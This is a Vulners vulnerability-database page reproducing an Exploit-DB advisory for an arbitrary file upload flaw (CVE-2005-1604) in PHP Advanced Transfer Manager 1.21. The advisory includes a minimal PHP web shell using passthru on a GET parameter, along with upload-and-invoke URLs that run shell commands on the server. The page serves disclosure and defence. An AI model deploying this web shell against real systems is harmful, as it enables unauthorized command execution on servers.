Lucene search
+L

PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload

🗓️ 06 May 2005 00:00:00Reported by tjomi4Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

PHP Advanced Transfer Manager 1.21 allows arbitrary file upload, risking remote code execution.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
PHP Advanced Transfer Manager < 1.22 Arbitrary File Upload
10 May 200500:00
nessus
nessus
Tenable Nessus
PHP Advanced Transfer Manager < 1.22 File Upload Arbitrary Command Execution
20 May 200500:00
nessus
nessus
Tenable Nessus
PHP Advanced Transfer Manager <= 1.21 Multiple Vulnerabilities
9 May 200500:00
nessus
cve
CVE
CVE-2005-1604
16 May 200504:00
cve
cvelist
Cvelist
CVE-2005-1604
16 May 200504:00
cvelist
euvd
EUVD
EUVD-2005-1607
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-1604
16 May 200504:00
nvd
source: https://www.securityfocus.com/bid/13542/info

PHP Advanced Transfer Manager is prone to a vulnerability regarding the uploading of arbitrary files.

If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. This can lead to unauthorized access in the context of the affected server.

This issue reportedly affects PHP Advanced Transfer Manager version 1.21; earlier versions may also be vulnerable.

Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://www.example.com/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 May 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.05097
20